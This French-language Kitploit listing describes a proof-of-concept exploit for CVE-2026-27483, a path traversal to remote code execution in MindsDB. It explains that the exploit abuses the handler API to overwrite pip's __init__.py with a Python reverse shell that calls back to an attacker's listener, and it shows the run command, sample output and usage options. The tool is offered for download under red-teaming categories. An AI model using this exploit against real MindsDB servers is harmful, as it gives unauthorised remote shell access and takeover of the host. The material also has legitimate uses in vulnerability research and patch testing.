Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
cve-2026-27483 — PoC de traversée de chemin vers RCE dans MindsDB | Kitploit
Outils/GitHubGitHub/thewhiteh4t/cve-2026-27483
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed TeamingDéveloppement de Charges Utiles
GitHubthewhiteh4t/cve-2026-27483

cve-2026-27483

PoC de traversée de chemin vers RCE dans MindsDB

Voir le dépôt
5il y a 5 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-27483

PoC — Traversée de chemin vers RCE dans MindsDB

Ce script PoC est basé sur l'avis GitHub suivant :

  • Par défaut, MindsDB n'utilise pas d'authentification.
  • Le PoC prend en charge les modes non authentifié et authentifié.
  • Nous pouvons interroger /api/handlers/ pour trouver les gestionnaires disponibles, puis utiliser le nom de n'importe quel gestionnaire disponible mais non installé.
  • Le PoC écrase /venv/lib/python3.10/site-packages/pip/__init__.py.
  • Un reverse shell Python est écrit dans ce chemin, puis déclenché.
root@kitploit:~
python cve-2026-27483.py -lh 192.168.0.100 -lp 4444 -u admin -p password

-------------------------------------
--- CVE-2026-27483 ------------------
--- MindsDB Path Traversal to RCE ---
-------------------------------------

[>] Found By : XlabAITeam
[>] PoC By   : Lohitya Pushkar (thewhiteh4t)

[>] Target   : http://127.0.0.1:47334
[>] LHOST    : 192.168.0.100
[>] LPORT    : 4444

[*] Checking status...

[*] MindsDB Version : 25.9.1.0
[+] Login successful!
[*] Uploading payload : qwvhotfj
[+] Payload uploaded!
[*] Triggering payload...

Dépendances

root@kitploit:~
pip3 install requests packaging

Utilisation

root@kitploit:~
python cve-2026-27483.py -h
usage: cve-2026-27483.py [-h] [-rh RH] [-rp RP] [-lh LH] [-lp LP] [-u U] [-p P]

options:
  -h, --help  show this help message and exit
  -rh RH      Target host
  -rp RP      Target port
  -lh LH      Listener host
  -lp LP      Listener port
  -u U        Username
  -p P        Password
Télécharger l’outil